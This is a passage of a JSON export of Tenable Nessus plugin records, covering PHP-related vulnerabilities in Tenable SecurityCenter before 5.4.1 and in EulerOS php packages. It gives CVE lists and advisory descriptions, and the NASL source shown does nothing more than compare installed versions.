arbitrary code.\n\n - A flaw exists in PHP in the _bc_new_num_ex() function within file ext/bcmath/libbcmath/src/init.c when handling values passed via the 'scale' parameter. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n\n - A flaw exists in PHP in the php_resolve_path() function within file main/fopen_wrappers.c when handling negative size values passed via the 'filename' parameter. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n\n - A flaw exists in PHP in the dom_document_save_html() function within file ext/dom/document.c due to missing NULL checks. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n\n - An integer overflow condition exists in PHP in the mb_encode_*() function in file ext/mbstring/mbstring.c due to improper validation of the length of encoded data. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - A NULL pointer dereference flaw exists in PHP in the CachingIterator() function within file ext/spl/spl_iterators.c when handling string conversion.\n An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n\n - An integer overflow condition exists in PHP in the number_format() function within file ext/standard/math.c when handling 'decimals' and 'dec_point' parameters with values equal or close to 0x7FFFFFFF. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\n - A overflow condition exists in PHP within file ext/intl/resourcebundle/resourcebundle_class.c, specifically in functions ResourceBundle::create() and ResourceBundle::getLocales(), due to improper validation of input passed via the 'bundlename' parameter. An unauthenticated, remote attacker can exploit this to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the php_pcre_replace_impl() function within file ext/pcre/php_pcre.c due to improper validation of certain unspecified input. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n _php_imap_mail() function in file ext/imap/php_imap.c when handling overly long strings. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\n - A flaw exists in PHP in the bzcompress() function when handling overly long strings. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n\n - An integer overflow condition exists in PHP in the gdImageAALine() function within file ext/gd/libgd/gd.c due to improper validation of line limit values.\n An unauthenticated, remote attacker can exploit this to cause an out-of-bounds write or read, resulting in a denial of service condition, the disclosure of memory contents, or the execution of arbitrary code.\n\n - Multiple stored cross-site scripting (XSS) vulnerabilities exist in unspecified scripts due to improper validation of input before returning it to users. An unauthenticated, remote attacker can exploit these, via a specially crafted request, to execute arbitrary script code in a user's browser session.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-01-27T00:00:00", "type": "nessus", "title": "Tenable SecurityCenter < 5.4.1 Multiple Vulnerabilities (TNS-2016-19)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7052", "CVE-2016-7103", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7126", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7415", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-9137"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:tenable:securitycenter"], "id": "SECURITYCENTER_5_4_1.NASL", "href": "https://www.tenable.com/plugins/nessus/96832", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96832);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2016-7052\",\n \"CVE-2016-7103\",\n \"CVE-2016-7124\",\n \"CVE-2016-7125\",\n \"CVE-2016-7126\",\n \"CVE-2016-7127\",\n \"CVE-2016-7128\",\n \"CVE-2016-7129\",\n \"CVE-2016-7130\",\n \"CVE-2016-7131\",\n \"CVE-2016-7132\",\n \"CVE-2016-7412\",\n \"CVE-2016-7413\",\n \"CVE-2016-7414\",\n \"CVE-2016-7415\",\n \"CVE-2016-7416\",\n \"CVE-2016-7417\",\n \"CVE-2016-7418\",\n \"CVE-2016-9137\"\n );\n script_bugtraq_id(\n 92552,\n 92564,\n 92755,\n 92756,\n 92757,\n 92758,\n 92764,\n 92767,\n 92768,\n 93004,\n 93005,\n 93006,\n 93007,\n 93008,\n 93011,\n 93022,\n 93171,\n 93577\n );\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Tenable SecurityCenter < 5.4.1 Multiple Vulnerabilities (TNS-2016-19)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Tenable SecurityCenter\napplication installed on the remote host is prior to 5.4.1. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in x509_vfy.c\n due to improper handling of certificate revocation lists\n (CRLs). An unauthenticated, remote attacker can exploit\n this, via a specially crafted CRL, to cause a NULL\n pointer dereference, resulting in a crash of the\n service. (CVE-2016-7052)\n\n - A cross-site scripting (XSS) vulnerability exists within\n the JQuery UI dialog() function due to improper\n validation of input to the 'closeText' parameter before\n returning it to users. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n request, to execute arbitrary script code in a user's\n browser session. (CVE-2016-7103)\n\n - A denial of service vulnerability exists in PHP within\n file ext/standard/var_unserializer.c due to improper\n handling of certain invalid objects. An unauthenticated,\n remote attacker can exploit this, via specially crafted\n serialized data that leads to a __destruct() or magic()\n function call, to cause a denial of service condition or\n potentially execute arbitrary code. (CVE-2016-7124)\n\n - A flaw exists in PHP in file ext/session/session.c when\n handling session names. An unauthenticated, remote\n attacker can exploit this to inject arbitrary data into\n sessions. (CVE-2016-7125)\n\n - An integer truncation error exists in PHP in the\n select_colors() function in file ext/gd/libgd/gd_topal.c\n when handling the number of colors. An unauthenticated,\n remote attacker can exploit this to cause a heap-based\n buffer overflow, resulting in the execution of arbitrary\n code. (CVE-2016-7126)\n\n - An array-indexing error exists in PHP in the\n imagegammacorrect() function within file ext/gd/gd.c\n when handling negative gamma values. An unauthenticated,\n remote attacker can exploit this, by writing a NULL to\n an arbitrary memory location, to cause a crash or the\n execution of arbitrary code. (CVE-2016-7127)\n\n - A flaw exists in PHP in the exif_process_IFD_in_TIFF()\n function within file ext/exif/exif.c when handling TIFF\n image content. An unauthenticated, remote attacker can\n exploit this to disclose memory contents.\n (CVE-2016-7128)\n\n - A denial of service vulnerability exists in PHP in the\n php_wddx_process_data() function within file\n ext/wddx/wddx.c when deserializing invalid dateTime\n values. An unauthenticated, remote attacker can exploit\n this to cause a crash. (CVE-2016-7129)\n\n - A NULL pointer dereference flaw exists in PHP in the\n php_wddx_pop_element() function within file\n ext/wddx/wddx.c when handling Base64 binary values. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2016-7130)\n\n - A NULL pointer dereference flaw exists in PHP in the\n php_wddx_deserialize_ex() function within file\n ext/wddx/wddx.c when handling invalid XML content. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2016-7131)\n\n - A NULL pointer dereference flaw exists in PHP in the\n php_wddx_pop_element() function within file\n ext/wddx/wddx.c. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition.\n (CVE-2016-7132)\n\n - A buffer overflow condition exists in PHP in file\n ext/mysqlnd/mysqlnd_wireprotocol.c within the\n php_mysqlnd_rowp_read_text_protocol_aux() function when\n handling the BIT field. An unauthenticated, remote\n attacker can exploit this to cause a heap-based buffer\n overflow, resulting in a crash or the execution of\n arbitrary code. (CVE-2016-7412)\n\n - A use-after-free error exists in PHP in the\n wddx_stack_destroy() function within file\n ext/wddx/wddx.c when deserializing recordset elements.\n An unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in PHP in the\n phar_parse_zipfile() function within file ext/phar/zip.c\n when handling the uncompressed file size. An\n unauthenticated, remote attacker can exploit this to\n have an unspecified impact. (CVE-2016-7414)\n\n - Multiple stack-based buffer overflow conditions exist in\n the International Components for Unicode for C/C++\n (ICU4C) component in the msgfmt_format_message()\n function within file common/locid.cpp when handling\n locale strings. An unauthenticated, remote attacker can\n exploit these, via a long locale string, to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2016-7415, CVE-2016-7416)\n\n - A flaw exists in PHP within file ext/spl/spl_array.c,\n specifically in the spl_array_get_dimension_ptr_ptr()\n function during the deserialization of SplArray, due to\n improper validation of types. An unauthenticated, remote\n attacker can exploit this to cause a crash or other\n unspecified impact. (CVE-2016-7417)\n\n - An out-of-bounds read error exists in PHP in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c. An unauthenticated, remote attacker\n can exploit this to cause a crash or the disclosure\n of memory contents. (CVE-2016-7418)\n\n - A use-after-free error exists in PHP within the\n unserialize() function in file ext/curl/curl_file.c. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-9137)\n\n - An integer overflow condition exists in PHP in the\n php_snmp_parse_oid() function in file ext/snmp/snmp.c.\n An unauthenticated, remote attacker can exploit this to\n cause a heap-based buffer overflow, resulting in the\n execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n sql_regcase() function within file ext/ereg/ereg.c when\n handling overly long strings. An unauthenticated, remote\n attacker can exploit this to corrupt memory, resulting\n in the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n php_base64_encode() function within file\n ext/standard/base64.c when handling overly long\n strings. An unauthenticated, remote attacker can exploit\n this to corrupt memory, resulting in the execution of\n arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n php_quot_print_encode() function within file\n ext/standard/quot_print.c when handling overly long\n strings. An unauthenticated, remote attacker can\n exploit this to cause a heap-based buffer overflow,\n resulting in the execution of arbitrary code.\n\n - A use-after-free error exists in PHP in the\n unserialize() function within file ext/standard/var.c.\n An unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code.\n\n - A flaw exists in PHP in the php_ftp_fopen_connect()\n function within file ext/standard/ftp_fopen_wrapper.c\n due to silently downgrading to regular FTP even if a\n secure method has been requested. A man-in-the-middle\n (MitM) attacker can exploit this to downgrade the FTP\n communication.\n\n - An integer overflow condition exists in PHP in the\n php_url_encode() function within file ext/standard/url.c\n when handling overly long strings. An unauthenticated,\n remote attacker can exploit this to corrupt memory,\n resulting in the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n php_uuencode() function in file ext/standard/uuencode.c.\n An unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in the execution of arbitrary\n code.\n\n - An integer overflow condition exists in PHP in the\n bzdecompress() function within file ext/bz2/bz2.c. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in the execution of arbitrary\n code.\n\n - An integer overflow condition exists in PHP in the\n curl_escape() function within file ext/curl/interface.c\n when handling overly long escaped strings. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in the execution of arbitrary\n code.\n\n - An out-of-bounds access error exists in PHP in file\n ext/phar/tar.c, specifically in the phar_parse_tarfile()\n function during the verification of signatures. An\n unauthenticated, remote attacker can exploit this to\n have an unspecified impact.\n\n - A flaw exists in PHP when destroying deserialized\n objects due to improper validation of certain\n unspecified input. An unauthenticated, remote attacker\n can exploit this to corrupt memory, resulting in a\n denial of service condition or the execution of\n arbitrary code.\n\n - An integer overflow condition exists in PHP within the\n fgetcsv() function due to improper validation of CSV\n field lengths. An unauthenticated, remote attacker can\n exploit this to corrupt memory, resulting in a denial of\n service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n wordwrap() function within file ext/standard/string.c\n due to improper validation of certain unspecified input.\n An unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n fgets() function within file ext/standard/file.c due to\n improper validation of certain unspecified input. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n xml_utf8_encode() function within file ext/xml/xml.c due\n to improper validation of certain unspecified input. An\n unauthenticated, remote attacker can exploit this to\n cause an unspecified impact.\n\n - A flaw exists in PHP in the exif_process_IFD_in_TIFF()\n function within file ext/exif/exif.c when handling\n uninitialized thumbnail data. An unauthenticated, remote\n attacker can exploit this to disclose memory contents.\n\n - A flaw exists in PHP due to the parse_url() function\n returning the incorrect host. An unauthenticated, remote\n attacker can exploit this to bypass authentication or to\n conduct open redirection and server-side request forgery\n attacks, depending on how the function is implemented.\n\n - A NULL pointer dereference flaw exists in PHP in the\n SimpleXMLElement::asXML() function within file\n ext/simplexml/simplexml.c. An unauthenticated, remote\n attacker can exploit this to cause a denial of service\n condition.\n\n - An heap buffer overflow condition exists in PHP in the\n php_ereg_replace() function within file ext/ereg/ereg.c\n due to improper validation of certain unspecified input.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code.\n\n - A flaw exists in PHP in file ext/openssl/openssl.c\n within the openssl_random_pseudo_bytes() function when\n handling strings larger than 2GB. An unauthenticated,\n remote attacker can exploit this to cause a denial of\n service condition.\n\n - A flaw exists in PHP in the openssl_encrypt() function\n within file ext/openssl/openssl.c when handling strings\n larger than 2GB. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition.\n\n - An integer overflow condition exists in PHP in the\n imap_8bit() function within file ext/imap/php_imap.c due\n to improper validation of certain unspecified input. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n\n - A flaw exists in PHP in the _bc_new_num_ex() function\n within file ext/bcmath/libbcmath/src/init.c when\n handling values passed via the 'scale' parameter. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition.\n\n - A flaw exists in PHP in the php_resolve_path() function\n within file main/fopen_wrappers.c when handling negative\n size values passed via the 'filename' parameter. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition.\n\n - A flaw exists in PHP in the dom_document_save_html()\n function within file ext/dom/document.c due to missing\n NULL checks. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition.\n\n - An integer overflow condition exists in PHP in the\n mb_encode_*() function in file ext/mbstring/mbstring.c\n due to improper validation of the length of encoded\n data. An unauthenticated, remote attacker can exploit\n this to corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n\n - A NULL pointer dereference flaw exists in PHP in the\n CachingIterator() function within file\n ext/spl/spl_iterators.c when handling string conversion.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition.\n\n - An integer overflow condition exists in PHP in the\n number_format() function within file ext/standard/math.c\n when handling 'decimals' and 'dec_point' parameters with\n values equal or close to 0x7FFFFFFF. An unauthenticated,\n remote attacker can exploit this to cause a heap-based\n buffer overflow, resulting in a denial of service\n condition or the execution of arbitrary code.\n\n - A overflow condition exists in PHP within file\n ext/intl/resourcebundle/resourcebundle_class.c,\n specifically in functions ResourceBundle::create() and\n ResourceBundle::getLocales(), due to improper validation\n of input passed via the 'bundlename' parameter. An\n unauthenticated, remote attacker can exploit this to\n cause a stack-based buffer overflow, resulting in a\n denial of service condition or the execution of\n arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n php_pcre_replace_impl() function within file\n ext/pcre/php_pcre.c due to improper validation of\n certain unspecified input. An unauthenticated, remote\n attacker can exploit this to cause a heap-based buffer\n overflow, resulting in a denial of service condition or\n the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the\n _php_imap_mail() function in file ext/imap/php_imap.c\n when handling overly long strings. An unauthenticated,\n remote attacker can exploit this to cause a heap-based\n buffer overflow, resulting in a denial of service\n condition or the execution of arbitrary code.\n\n - A flaw exists in PHP in the bzcompress() function when\n handling overly long strings. An unauthenticated, remote\n attacker can exploit this to cause a denial of service\n condition.\n\n - An integer overflow condition exists in PHP in the\n gdImageAALine() function within file ext/gd/libgd/gd.c\n due to improper validation of line limit values.\n An unauthenticated, remote attacker can exploit this to\n cause an out-of-bounds write or read, resulting in a\n denial of service condition, the disclosure of memory\n contents, or the execution of arbitrary code.\n\n - Multiple stored cross-site scripting (XSS)\n vulnerabilities exist in unspecified scripts due to\n improper validation of input before returning it to\n users. An unauthenticated, remote attacker can exploit\n these, via a specially crafted request, to execute\n arbitrary script code in a user's browser session.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2016-19\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Tenable SecurityCenter version 5.4.1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9137\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_ports(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nversion = get_kb_item(\"Host/SecurityCenter/Version\");\nif(empty_or_null(version))\n{\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n version = install[\"version\"];\n}\nfix = \"5.4.1\";\n\nif ( version =~ \"^5\\.[0-3]([^0-9]|$)\" || version =~ \"^5\\.4\\.0([^0-9]|$)\" )\n{\n items = make_array(\"Installed version\", version,\n \"Fixed version\", fix\n );\n\n order = make_list(\"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(severity:SECURITY_HOLE, port:0, extra:report, xss:TRUE);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'SecurityCenter', version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:54", "description": "According to the versions of the php packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - The get_icu_disp_value_src_php function in ext/intl/locale/locale_methods.c in PHP before 5.3.29, 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not properly restrict calls to the ICU uresbund.cpp component, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a locale_get_display_name call with a long first argument.(CVE-2014-9912)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert function in ext/spl/spl_heap.c in PHP before 5.5.27 and 5.6.x before 5.6.11 allows remote attackers to execute arbitrary code by triggering a failed SplMinHeap::compare operation.(CVE-2015-4116)\n\n - A flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-7803)\n\n - A flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-7804)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x before 5.6.6, when PHP-FPM is used, does not isolate each thread from libxml_disable_entity_loader changes in other threads, which allows remote attackers to conduct XML External Entity (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document, a related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - Stack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.(CVE-2015-8874)\n\n - It was found that the exif_convert_any_to_int() function in PHP was vulnerable to floating point exceptions when parsing tags in image files. A remote attacker with the ability to upload a malicious image could crash PHP, causing a Denial of Service.(CVE-2016-10158)\n\n - Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.(CVE-2016-10159)\n\n - The php_url_parse_ex function in ext/standard/url.c in PHP before 5.5.38 allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via vectors involving the smart_str data type.(CVE-2016-6288)\n\n - The exif_process_IFD_in_MAKERNOTE function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (out-of-bounds array access and memory corruption), obtain sensitive information from process memory, or possibly have unspecified other impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The exif_process_user_comment function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted JPEG image.(CVE-2016-6292)\n\n - The locale_accept_from_http function in ext/intl/locale/locale_methods.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 does not properly restrict calls to the ICU uloc_acceptLanguageFromHTTP function, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long argument.(CVE-2016-6294)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x before 7.0.10 skips invalid session names in a way that triggers incorrect parsing, which allows remote attackers to inject arbitrary-type session data by leveraging control of a session name, as demonstrated by object injection.(CVE-2016-7125)\n\n - The exif_process_IFD_in_TIFF function in ext/exif/exif.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles the case of a thumbnail offset that exceeds the file size, which allows remote attackers to obtain sensitive information from process memory via a crafted TIFF image.(CVE-2016-7128)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, a stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could cause a denial of service or potentially allow executing code. NOTE: this is only relevant for PHP applications that accept untrusted input (instead of the system's php.ini file) for the parse_ini_string or parse_ini_file function, e.g., a web application for syntax validation of php.ini directives.(CVE-2017-11628)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before 7.2.4. Dumpable FPM child processes allow bypassing opcache access controls because fpm_unix.c makes a PR_SET_DUMPABLE prctl call, allowing one user (in a multiuser environment) to obtain sensitive information from the process memory of a second user's PHP applications by running gcore on the PID of the PHP-FPM worker process.(CVE-2018-10545)\n\n - An issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file.(CVE-2018-10547)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\n - A cross-site scripting (XSS) vulnerability in Apache2 component of PHP was found. When using 'Transfer-Encoding: chunked', the request allows remote attackers to potentially run a malicious script in a victim's browser. This vulnerability can be exploited only by producing malformed requests and it's believed it's unlikely to be used in practical cross-site scripting attack.(CVE-2018-17082)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-09-24T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : php (EulerOS-SA-2019-1984)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9912", "CVE-2015-4116", "CVE-2015-5161", "CVE-2015-7803", "CVE-2015-7804", "CVE-2015-8866", "CVE-2015-8874", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-6288", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-7125", "CVE-2016-7128", "CVE-2016-7418", "CVE-2017-11628", "CVE-2018-10545", "CVE-2018-10547", "CVE-2018-14851", "CVE-2018-17082", "CVE-2018-5711", "CVE-2018-5712"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:huawei:euleros:2.0", "p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "p-cpe:/a:huawei:euleros:php-gd", "p-cpe:/a:huawei:euleros:php-ldap", "p-cpe:/a:huawei:euleros:php-mysql", "p-cpe:/a:huawei:euleros:php-odbc", "p-cpe:/a:huawei:euleros:php-pdo", "p-cpe:/a:huawei:euleros:php-pgsql", "p-cpe:/a:huawei:euleros:php-process", "p-cpe:/a:huawei:euleros:php-recode", "p-cpe:/a:huawei:euleros:php-soap", "p-cpe:/a:huawei:euleros:php-xml", "p-cpe:/a:huawei:euleros:php-xmlrpc"], "id": "EULEROS_SA-2019-1984.NASL", "href": "https://www.tenable.com/plugins/nessus/129178", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129178);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-9912\",\n \"CVE-2015-4116\",\n \"CVE-2015-7803\",\n \"CVE-2015-7804\",\n \"CVE-2015-8866\",\n \"CVE-2015-8874\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-6288\",\n \"CVE-2016-6291\",\n \"CVE-2016-6292\",\n \"CVE-2016-6294\",\n \"CVE-2016-7125\",\n \"CVE-2016-7128\",\n \"CVE-2016-7418\",\n \"CVE-2017-11628\",\n \"CVE-2018-10545\",\n \"CVE-2018-10547\",\n \"CVE-2018-14851\",\n \"CVE-2018-17082\",\n \"CVE-2018-5711\",\n \"CVE-2018-5712\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : php (EulerOS-SA-2019-1984)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - The get_icu_disp_value_src_php function in\n ext/intl/locale/locale_methods.c in PHP before 5.3.29,\n 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not\n properly restrict calls to the ICU uresbund.cpp\n component, which allows remote attackers to cause a\n denial of service (buffer overflow) or possibly have\n unspecified other impact via a locale_get_display_name\n call with a long first argument.(CVE-2014-9912)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP before 5.5.27 and\n 5.6.x before 5.6.11 allows remote attackers to execute\n arbitrary code by triggering a failed\n SplMinHeap::compare operation.(CVE-2015-4116)\n\n - A flaw was found in the way the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-7803)\n\n - A flaw was found in the way the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-7804)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x\n before 5.6.6, when PHP-FPM is used, does not isolate\n each thread from libxml_disable_entity_loader changes\n in other threads, which allows remote attackers to\n conduct XML External Entity (XXE) and XML Entity\n Expansion (XEE) attacks via a crafted XML document, a\n related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - Stack consumption vulnerability in GD in PHP before\n 5.6.12 allows remote attackers to cause a denial of\n service via a crafted imagefilltoborder\n call.(CVE-2015-8874)\n\n - It was found that the exif_convert_any_to_int()\n function in PHP was vulnerable to floating point\n exceptions when parsing tags in image 